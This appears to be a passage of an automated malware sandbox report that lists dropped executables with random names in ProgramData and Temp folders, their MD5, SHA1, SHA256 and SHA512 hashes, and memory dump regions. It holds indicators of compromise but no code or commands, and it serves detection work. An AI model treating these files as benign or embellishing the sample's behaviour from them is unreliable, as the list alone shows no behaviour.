SHA512 3608299315b6f5da62bab8d086c4d6018148aaa9b23ee204263021c5bae304d3818167cbc287f64d6228aeba2c60275f670e4882ce516274d0923cce7dd8b69a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json

MD5 99914b932bd37a50b983c5e7c90ae93b
SHA1 bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA256 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA512 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

C:\ProgramData\lxt00zm7y5.exe

MD5 042cec73ee7e7379835ad459f83e0058
SHA1 6089a709852bb03a52070d31b589070512631d0c
SHA256 d7eaaa76cc94395b4d2bcfea04c0327eabb670984c0a7e45ac4180ef4bf6c7be
SHA512 e8a66da0c45e0161129405084a5e6c0b1549d0f6374eac4f7ba81b9b37db3b049824ad731a6a2c889114a2dc631d84e212456e8d9d12a2508ba49c24706e1232

C:\ProgramData\gdbas2va1v.exe

MD5 3bcf722b3c1558543193602257002223
SHA1 79a01bb1385da53b7acdfaddcc46ba38b3b145fd
SHA256 e934e3fb4b3adf8cc7219e7b353f25c800e8c32be14daad66e828bb81223e6d1
SHA512 778d8d7916f279fcf1fee8932f06289e4461f21bf382cc1f1d80e978c831b11ebf6a75385996d738fdc6faa087279f80517061d8b5b5eed925e0c8fb42b69e6a

memory/3484-9548-0x0000000000D70000-0x0000000000DA0000-memory.dmp

C:\ProgramData\pzukxlf37g.exe

MD5 13a4c0c6e39330c30df4e82a91c639ea
SHA1 f93bd558aa888b4362e4b56cb96f5c08c4f37c29
SHA256 4e0ea331876cc68bd36399074a2e40a36398354db28624f3d7fddfa6d3cbf107
SHA512 fa0c09dc8aafd471d53ee1cc5225406865bbefae0005fcb1b78fbb22c8a1d50bb1121217b38557e012c118159268ad79fe6da1e1c24a71b9940560413c16c0cf

C:\ProgramData\i58qqiwlxb.exe

MD5 cb2e51e6572d2b9e45fc39d4ab138a11
SHA1 9ac44282622713dc53ceeb974177a0e900fae972
SHA256 e015719aad3e56e0d0ea614d0868adf95829164b6f89d2232b6084072b17ab2b
SHA512 35c606388057fe92347a78b7dfa3312fcea8e904f103f53ce7f7fdafc137b228ea5f8931de6440164d196c006527eb3643f3d1f470bbba5873c6a47c6393bc06

memory/2112-9659-0x00000000005D0000-0x00000000008F4000-memory.dmp

C:\ProgramData\2vs2djekf3.exe

MD5 5652007fc33770930fe7617db0afd050
SHA1 d9dc2cc02a4efa1ef8547866d5da4158dc23ed37
SHA256 a725e7ba66b0fe17b96b1e8611555f6036db330a39f736a3f855dda5410e3679
SHA512 e19e959eff29e1b35d44c64a478d8cd976dbe6fbcffcc3b074f2c8011811e1aa2fe00e3d8b7ac5452d4aceb756fd8307f624154379fc74597410e288b7e45291

memory/2584-9703-0x0000000000D10000-0x0000000000D22000-memory.dmp

memory/2584-9704-0x0000000005570000-0x000000000560C000-memory.dmp

memory/2584-9707-0x0000000005EC0000-0x0000000006464000-memory.dmp

memory/2584-9712-0x00000000059B0000-0x0000000005A42000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10525150101\Bw5ZAOe.exe

MD5 14d8ea2e66d596a466742e68279fe860
SHA1 54c31d3960170e43ce50f8b8c218b05593268cf1
SHA256 a156d2b61b0405b1b57b985670c249ff89145cfdea773597c512baf335b4b04d
SHA512 639b1b28945a7186e0b52fead331cd043f03860cb82f6b547d4a2f6ce3f5d28150f057fcd5127391c49c901aca91e3db9d28930ce05267c44bc9e6448ebf9bec

memory/3112-9854-0x000000001BC40000-0x000000001BCF2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10525160101\Fv6kVbJ.exe

MD5 806dddad95a8d832f0c6dc510020d3bc
SHA1 8edbba40250e80cd03ecb87e19b6bdc5db1eb6af
SHA256 e56ba8358cba13612431301891da92e7478acf1e186c03badd80c5068e7f1dff
SHA512 4e03b6991d09cfae16cda38273a9dac98c8e540fafacf547fa933cbb520efbee194b062c5248a7d421f9adc3ffd7ad60e0911e996483d91c94d5f8a15a506066

memory/3112-10004-0x000000001BBC0000-0x000000001BBFC000-memory.dmp

memory/3112-10003-0x000000001BB10000-0x000000001BB22000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10525180101\EG11t89.exe

MD5 ba01c240fdd11386acc2fa80ae7a30f2
SHA1 312629d6ab967b5eb6919073331f99dc57a571af
SHA256 9997e6e77790479cdeb4ea52da4c0e567be08dac3ca732d14a64f0935ab8b30b
SHA512 f167bd265200710747b24f375f0c4637a93ec3225ed787d7e95c54a6f284d54d2be7f0dcb953c0129140acdfa257c6d61a2990cee8ad1351f496718103016149

memory/2584-10159-0x0000000005990000-0x000000000599A000-memory.dmp

memory/2584-10165-0x0000000005D70000-0x0000000005DD6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10525330101\ku56mNL.exe

MD5 84680e8e4ecfb0aeb33e805e8d50ca4b
SHA1 d2becbf93cf995e37125d13e2ce377b3bcd849a8
SHA256 9fe0517888cea535c33074fa0ef13ac9461a715cfadb4d742273a06af00e11c6
SHA512 2738b8ed036a8a88ee9ae6a724b2596b00a2f796392d76b302c05cdd3bdc55ecbfe89bfffc04bc45ba1c97c1712119133cc77c4cee8bac6b355f35dee2432d7c